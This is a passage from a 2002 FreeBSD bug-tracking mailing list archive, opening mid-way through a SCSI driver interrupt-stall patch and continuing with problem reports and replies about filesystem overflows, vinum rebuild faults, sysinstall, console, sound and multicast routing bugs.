=3D np->clock_curr; +=09=09=09np->stall_state =3D 1; +=09=09} +=09=09break; + +=09case 1:=09/* Detect a possible interrupt stall */ +#ifndef DEBUG_INTR_STALL +=09=09if (intr_prevc !=3D np->intr_count || !istat) { +=09=09=09np->stall_state =3D 2; +=09=09=09break; +=09=09} +#endif +=09=09if (((int)(np->clock_curr - np->clock_stall)) < (hz+4)/5) +=09=09=09break; + +=09=09++np->stall_count; +=09=09if (np->stall_count < 5) { +=09=09=09np->stall_state =3D 2; +=09=09=09printf("%s: interrupt stall, forcing service.\n", +=09=09=09 sym_name(np)); +=09=09} +=09=09else { +=09=09=09np->stall_state =3D 3; +=09=09=09printf("%s: interrupt stall, installing workaround.\n", +=09=09=09 sym_name(np)); +=09=09} +=09=09sym_intr1(np); +=09=09break; + +=09case 3:=09/* Force service if interrupt condition is pending */ +=09=09if (istat) +=09=09=09sym_intr1(np); +=09=09break; +=09} + +=09np->clock_ch =3D timeout(sym_clock_handler, (caddr_t)np, SYM_CLOCK_TICK= ); +=09splx(s); +} +#endif /* SYM_CONF_HANDLE_INTR_STALL */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Aug 18 14:40:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7538B37B400 for ; Sun, 18 Aug 2002 14:40:07 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 31C6B43E77 for ; Sun, 18 Aug 2002 14:40:07 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7ILe7JU073696 for ; Sun, 18 Aug 2002 14:40:07 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7ILe7k1073694; Sun, 18 Aug 2002 14:40:07 -0700 (PDT) Date: Sun, 18 Aug 2002 14:40:07 -0700 (PDT) Message-Id: <200208182140.g7ILe7k1073694@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Tha KreAture" Subject: Re: i386/41723: Copying files to filesystem causes "integer divide fault" and panic. Reply-To: "Tha KreAture" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR i386/41723; it has been noted by GNATS. From: "Tha KreAture" To: , Cc: Subject: Re: i386/41723: Copying files to filesystem causes "integer divide fault" and panic. Date: Sun, 18 Aug 2002 23:40:46 +0200 Ahh I see. Well, then something is afoot. It may be some emulator or compiler option I am using then, that allowed 'long' to deal with the numbers 'int' didn't. ??? Anyway: int was 32 bit and the sum of the calculations could well be too large. I agree that int64_t is a safer and more precise solution because it is not subject to platform differences. I still believe a check chould be added in the system to make sure it won't allow values of avg file size and files pr dir to result in overflows when multiplied. There are other similar calculations all through ffs that really need to be addressed. It's also ridiculus that newfs will segfault if you give it a blocksize larger than 65536, but that is a different matter. (and probably is already, or will be fixed.) Kyrre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Aug 18 14:49:46 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A4D7337B400; Sun, 18 Aug 2002 14:49:45 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 202CB43E65; Sun, 18 Aug 2002 14:49:45 -0700 (PDT) (envelope-from johan@FreeBSD.org) Received: from freefall.freebsd.org (johan@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7ILnjJU075475; Sun, 18 Aug 2002 14:49:45 -0700 (PDT) (envelope-from johan@freefall.freebsd.org) Received: (from johan@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7ILni5r075471; Sun, 18 Aug 2002 14:49:44 -0700 (PDT) Date: Sun, 18 Aug 2002 14:49:44 -0700 (PDT) From: Johan Karlsson Message-Id: <200208182149.g7ILni5r075471@freefall.freebsd.org> To: dan@obluda.cz, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/39816: cleaning sbin/camcontrol code from warnings Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: cleaning sbin/camcontrol code from warnings State-Changed-From-To: open->closed State-Changed-By: johan State-Changed-When: Sun Aug 18 14:49:20 PDT 2002 State-Changed-Why: Committed, thanks. http://www.freebsd.org/cgi/query-pr.cgi?pr=39816 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Aug 18 15:30: 7 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 9D1E237B400 for ; Sun, 18 Aug 2002 15:30:02 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 024A143E77 for ; Sun, 18 Aug 2002 15:30:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7IMU1JU086554 for ; Sun, 18 Aug 2002 15:30:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7IMU1Gb086553; Sun, 18 Aug 2002 15:30:01 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 376E737B400 for ; Sun, 18 Aug 2002 15:25:00 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7F91343E6A for ; Sun, 18 Aug 2002 15:24:59 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g7IMOxOT028943 for ; Sun, 18 Aug 2002 15:24:59 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g7IMOxWb028942; Sun, 18 Aug 2002 15:24:59 -0700 (PDT) Message-Id: <200208182224.g7IMOxWb028942@www.freebsd.org> Date: Sun, 18 Aug 2002 15:24:59 -0700 (PDT) From: Daniel Müller To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: bin/41769: sysinstall fails to enter timezone menu Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41769 >Category: bin >Synopsis: sysinstall fails to enter timezone menu >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Aug 18 15:30:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Daniel Müller >Release: 4.6-STABLE >Organization: - >Environment: FreeBSD smoky.home 4.6-STABLE FreeBSD 4.6-STABLE #0: Mon Aug 19 00:00:57 CEST 2002 root@:/usr/obj/usr/src/sys/SMOKY i386 >Description: After cvsup to the latest sources and build world (like handbook), inclusive recompiling sysinstall, i was not able anymore to enter the timezone configuration in sysinstall, which worked before. >How-To-Repeat: cvsup to RELENG_4 build world(like handbook) try to enter the timezone menu in sysinstall >Fix: Please let me know if a fix is found... >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Aug 18 18: 0:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AE3B937B400 for ; Sun, 18 Aug 2002 18:00:09 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id A84D943E70 for ; Sun, 18 Aug 2002 18:00:07 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7J107JU021053 for ; Sun, 18 Aug 2002 18:00:07 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7J107Hp021052; Sun, 18 Aug 2002 18:00:07 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CED4637B400 for ; Sun, 18 Aug 2002 17:58:40 -0700 (PDT) Received: from 126.216-123-229-0.interbaun.com (126.216-123-229-0.interbaun.com [216.123.229.126]) by mx1.FreeBSD.org (Postfix) with ESMTP id B125E43E75 for ; Sun, 18 Aug 2002 17:58:39 -0700 (PDT) (envelope-from root@126.216-123-229-0.interbaun.com) Received: (from root@localhost) by 126.216-123-229-0.interbaun.com (8.11.6/8.11.6) id g7J0wbY17940; Sun, 18 Aug 2002 18:58:37 -0600 (MDT) (envelope-from root) Message-Id: <200208190058.g7J0wbY17940@126.216-123-229-0.interbaun.com> Date: Sun, 18 Aug 2002 18:58:37 -0600 (MDT) From: soralx@cydem.zp.ua To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: misc/41771: '/etc/ttys' and X Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41771 >Category: misc >Synopsis: '/etc/ttys' and X >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Aug 18 18:00:07 PDT 2002 >Closed-Date: >Last-Modified: >Originator: SorAlx >Release: FreeBSD 4.5-RELEASE i386 (updated from 'FreeBSD 4.4-RELEASE i386') >Organization: cydem.zp.ua >Environment: System: FreeBSD soralx.home 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Sun May 5 23:57:12 MDT 2002 root@soralx.home:/usr/src/sys/compile/SORALX i386 Hardware: tested on some 80486 and Pentiums >Description: When X is loaded, I change '/etc/ttys' (from ttyv), run `init q` and try to switch back to X console - current ttyv console halts (kbd doesn't work, cursor doesn't blink, etc) Using telnet, I restore '/etc/ttys', `init q` - and everything works again >How-To-Repeat: >Fix: not fixed yet >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Aug 18 18: 0:19 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C922337B405 for ; Sun, 18 Aug 2002 18:00:09 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 331F943E75 for ; Sun, 18 Aug 2002 18:00:08 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7J108JU021066 for ; Sun, 18 Aug 2002 18:00:08 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7J107gv021065; Sun, 18 Aug 2002 18:00:07 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0FFCB37B400 for ; Sun, 18 Aug 2002 17:59:04 -0700 (PDT) Received: from 126.216-123-229-0.interbaun.com (126.216-123-229-0.interbaun.com [216.123.229.126]) by mx1.FreeBSD.org (Postfix) with ESMTP id 1991643E65 for ; Sun, 18 Aug 2002 17:59:01 -0700 (PDT) (envelope-from root@126.216-123-229-0.interbaun.com) Received: (from root@localhost) by 126.216-123-229-0.interbaun.com (8.11.6/8.11.6) id g7J0wxg17992; Sun, 18 Aug 2002 18:58:59 -0600 (MDT) (envelope-from root) Message-Id: <200208190058.g7J0wxg17992@126.216-123-229-0.interbaun.com> Date: Sun, 18 Aug 2002 18:58:59 -0600 (MDT) From: soralx@cydem.zp.ua To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: misc/41772: can't disable keybell Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41772 >Category: misc >Synopsis: can't disable keybell >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Aug 18 18:00:07 PDT 2002 >Closed-Date: >Last-Modified: >Originator: SorAlx >Release: FreeBSD 4.5-RELEASE i386 (updated from 'FreeBSD 4.4-RELEASE i386') >Organization: cydem.zp.ua >Environment: System: FreeBSD soralx.home 4.5-RELEASE FreeBSD 4.5-RELEASE #0: Sun May 5 23:57:12 MDT 2002 root@soralx.home:/usr/src/sys/compile/SORALX i386 Hardware: tested on some 80486 and Pentiums >Description: Even though i have 'keybell=NO' in '/etc/rc.conf', the beeper doesn't shut up. Also I tried `kbdcontrol -b quiet.off` >How-To-Repeat: >Fix: not fixed yet; wait... >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Aug 18 19:30: 5 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id ECAB337B400 for ; Sun, 18 Aug 2002 19:30:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 96E5143E42 for ; Sun, 18 Aug 2002 19:30:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7J2U3JU044599 for ; Sun, 18 Aug 2002 19:30:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7J2U35G044596; Sun, 18 Aug 2002 19:30:03 -0700 (PDT) Date: Sun, 18 Aug 2002 19:30:03 -0700 (PDT) Message-Id: <200208190230.g7J2U35G044596@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Orion Hodson Subject: Re: kern/41747: quake won't play sound with newpcm driver Reply-To: Orion Hodson Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/41747; it has been noted by GNATS. From: Orion Hodson To: freebsd-gnats-submit@FreeBSD.org, q@uni.de Cc: Subject: Re: kern/41747: quake won't play sound with newpcm driver Date: Sun, 18 Aug 2002 19:26:09 -0700 Ulrich, try re-arranging the initialization code in bsd/snd_bsd.c so that mmap() comes after the format option ioctls have been made. Cheers - Orion To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 0: 0:19 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BD48437B400 for ; Mon, 19 Aug 2002 00:00:12 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 049C543E6A for ; Mon, 19 Aug 2002 00:00:12 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7J70BJU010479 for ; Mon, 19 Aug 2002 00:00:11 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7J70BJV010477; Mon, 19 Aug 2002 00:00:11 -0700 (PDT) Date: Mon, 19 Aug 2002 00:00:11 -0700 (PDT) Message-Id: <200208190700.g7J70BJV010477@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Vallo Kallaste Subject: Re: kern/41740: vinum issues: page fault while rebuilding; inability to hot-rebuild striped plexes Reply-To: Vallo Kallaste Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/41740; it has been noted by GNATS. From: Vallo Kallaste To: Doug Swarin Cc: freebsd-gnats-submit@FreeBSD.ORG, grog@lemis.com Subject: Re: kern/41740: vinum issues: page fault while rebuilding; inability to hot-rebuild striped plexes Date: Mon, 19 Aug 2002 09:51:14 +0300 On Fri, Aug 16, 2002 at 06:06:51PM -0700, Doug Swarin wrote: > >Number: 41740 > >Category: kern > >Synopsis: vinum issues: page fault while rebuilding; inability to hot-rebuild striped plexes > >Confidential: no > >Severity: serious > >Priority: medium > >Responsible: freebsd-bugs > >State: open > >Quarter: > >Keywords: > >Date-Required: > >Class: sw-bug > >Submitter-Id: current-users > >Arrival-Date: Fri Aug 16 18:10:03 PDT 2002 > >Closed-Date: > >Last-Modified: > >Originator: Doug Swarin > >Release: 4-STABLE > >Organization: > >Environment: > FreeBSD vmware.localdomain 4.6-STABLE #12: Fri Aug 16 16:29:37 CDT 2002 root@vmware.localdomain:/usr/obj/usr/src/sys/VMWARE i386 > >Description: > 1. The launch_requests() function in vinumrequest.c needs splbio() protection around the lower loop. Without splbio(), complete_rqe() may be called at splx() in BUF_STRATEGY(). If there are inactive rqgs in rq (for example, with XFR_BAD_SUBDISK), rq may be deallocated before the loop completes walking the rqg queue in rq, causing either a page fault or an infinite loop. > > 2. A striped plex cannot be safely hot-rebuilt, and there is no warning as such in the documentation. Because all requests to the rebuilding plex return REQUEST_DOWN, the two plexes will be inconsistent after the rebuild finishes since writes to the already-rebuilt region of the rebuilding plex will only be written to the good plex. > >How-To-Repeat: > 1. Create a pair of striped plexes as a single volume. 'vinum stop' one plex, then 'vinum start' it to start it rebuilding. Run postmark or perform other heavy activity against the mounted filesystem while the rebuild takes place. > > 2. After the above hot-rebuild, demount it, fsck, and watch the errors fly. The splbio() fix will probably need to be applied before the hot-rebuild will succeed. > >Fix: > 1. Add 'int s;' to the top of launch_requests() and 's = splbio();' at line 395 and 'splx(s);' at line 439. I apologize for not providing an actual diff, because I am using the web form to submit this. > > 2. Add a mention to the documentation not to hot-rebuild a striped plex. The long-term fix would be to do the missing code in checksdstate() in vinumstate.c to return the proper result for a striped plex. > >Release-Note: > >Audit-Trail: > >Unformatted: This behaviour (corrupt FS after hot-rebuild involving user I/O at the same time) is same as I discovered for RAID-5 volume long ago. I don't have necessary hardware at the moment, but could it be this will fix RAID-5 hot-rebuild problem also? -- Vallo Kallaste vallo@estcard.ee To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 2:28:25 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7A87537B400; Mon, 19 Aug 2002 02:28:23 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 40E3943E6A; Mon, 19 Aug 2002 02:28:23 -0700 (PDT) (envelope-from knu@FreeBSD.org) Received: from freefall.freebsd.org (knu@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7J9SNJU052243; Mon, 19 Aug 2002 02:28:23 -0700 (PDT) (envelope-from knu@freefall.freebsd.org) Received: (from knu@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7J9SMHV052239; Mon, 19 Aug 2002 18:28:22 +0900 (JST) Date: Mon, 19 Aug 2002 18:28:22 +0900 (JST) From: Akinori MUSHA Message-Id: <200208190928.g7J9SMHV052239@freefall.freebsd.org> To: iwaki@bc.niigata-u.ac.jp, knu@FreeBSD.org, freebsd-bugs@FreeBSD.org, sobomax@FreeBSD.org Subject: Re: bin/41482: pkg_info core-dumps for old style +CONTENTS file Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: pkg_info core-dumps for old style +CONTENTS file State-Changed-From-To: open->patched State-Changed-By: knu State-Changed-When: Mon Aug 19 18:17:40 JST 2002 State-Changed-Why: Sobomax committed the fix to 5-CURRENT. A due MFC to RELENG_4 will follow. However, note that there is no hope that it will be MFC'd to RELENG_4_[456] since re@ seem to want only security related fixes to be MFC'd to these branches. So RELENG_4_[456] users must check out src/usr.sbin/pkg_install of RELENG_4 if they want to manipulate packages properly. Sorry for the inconvenience. Responsible-Changed-From-To: freebsd-bugs->sobomax Responsible-Changed-By: knu Responsible-Changed-When: Mon Aug 19 18:17:40 JST 2002 Responsible-Changed-Why: Sobomax committed the fix to 5-CURRENT. A due MFC to RELENG_4 will follow. However, note that there is no hope that it will be MFC'd to RELENG_4_[456] since re@ seem to want only security related fixes to be MFC'd to these branches. So RELENG_4_[456] users must check out src/usr.sbin/pkg_install of RELENG_4 if they want to manipulate packages properly. Sorry for the inconvenience. http://www.freebsd.org/cgi/query-pr.cgi?pr=41482 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 3:10:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EEF3A37B405 for ; Mon, 19 Aug 2002 03:10:03 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id A886043E7B for ; Mon, 19 Aug 2002 03:10:03 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JAA3JU064606 for ; Mon, 19 Aug 2002 03:10:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JAA3HI064605; Mon, 19 Aug 2002 03:10:03 -0700 (PDT) Date: Mon, 19 Aug 2002 03:10:03 -0700 (PDT) Message-Id: <200208191010.g7JAA3HI064605@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Nick Hilliard Subject: Re: conf/35178: ipfilter for IPV6 not availlable in rc.* Reply-To: Nick Hilliard Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR conf/35178; it has been noted by GNATS. From: Nick Hilliard To: freebsd-gnats-submit@FreeBSD.org Cc: crist.clark@attbi.com Subject: Re: conf/35178: ipfilter for IPV6 not availlable in rc.* Date: 19 Aug 2002 11:05:46 +0100 On Fri, Mar 01, 2002 at 08:37:05AM -0800, Crist J. Clark wrote: > The problem with that is ipfilter_active would not be available at > this point. It is local to the network_pass1() function in > rc.network. It is possible to make it global, but very kludgey, > passing data between the scripts in that way. In my scripts, I've just > dropped the flush completely. It doesn't really seem all that > necessary to me. Crist, This pr + the patch you posted seem to have fallen through the cracks. Could you consider committing it to -current without the flush? It would be nice to get it into 4.7. Nick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 4:50:39 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id BD3E437B409 for ; Mon, 19 Aug 2002 04:50:35 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0005443E4A for ; Mon, 19 Aug 2002 04:50:17 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JBo7JU094338 for ; Mon, 19 Aug 2002 04:50:07 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JBo6qG094323; Mon, 19 Aug 2002 04:50:06 -0700 (PDT) Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1187637B405 for ; Mon, 19 Aug 2002 04:42:43 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by mx1.FreeBSD.org (Postfix) with ESMTP id BA43543E72 for ; Mon, 19 Aug 2002 04:42:42 -0700 (PDT) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JBggOT030162 for ; Mon, 19 Aug 2002 04:42:42 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g7JBggZI030161; Mon, 19 Aug 2002 04:42:42 -0700 (PDT) Message-Id: <200208191142.g7JBggZI030161@www.freebsd.org> Date: Mon, 19 Aug 2002 04:42:42 -0700 (PDT) From: Renato Branco To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/41776: mrouted doesn't route multicast packets Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 41776 >Category: i386 >Synopsis: mrouted doesn't route multicast packets >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Aug 19 04:50:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Renato Branco >Release: 4.6 >Organization: PROCERGS >Environment: FreeBSD baghdad.procergs.com.br 4.6-RELEASE FreeBSD 4.6-RELEASE #3: Wed Aug 14 16:49:31 BRT 2002 root@baghdad.procer gs.com.br:/usr/src/sys/compile/BAGHDAD i386 >Description: I compiled the FreeBSD with MROUTING options and put the line mrouted.enable="YES" in rc.conf file. After initialization, its don't route multicast packets and when I send any mrouted command with debug option, I always receive the same message : debug level 0x400 (route_detail) 08:36:04.279 mrouted version 3.9-beta3+IOS12 starting 08:36:04.279 can't enable Multicast routing in kernel: Address already in use Thanks ! >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Aug 19 4:58:30 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8ACC637B405; Mon, 19 Aug 2002 04:58:29 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id A9B0F43E42; Mon, 19 Aug 2002 04:58:28 -0700 (PDT) (envelope-from ru@FreeBSD.org) Received: from freefall.freebsd.org (ru@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g7JBwRJU096553; Mon, 19 Aug 2002 04:58:27 -0700 (PDT) (envelope-from ru@freefall.freebsd.org) Received: (from ru@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g7JBvg5g096437; Mon, 19 Aug 2002 04:57:42 -0700 (PDT) Date: Mon, 19 Aug 2002 04:57:42 -0700 (PDT) From: Ruslan Ermilov 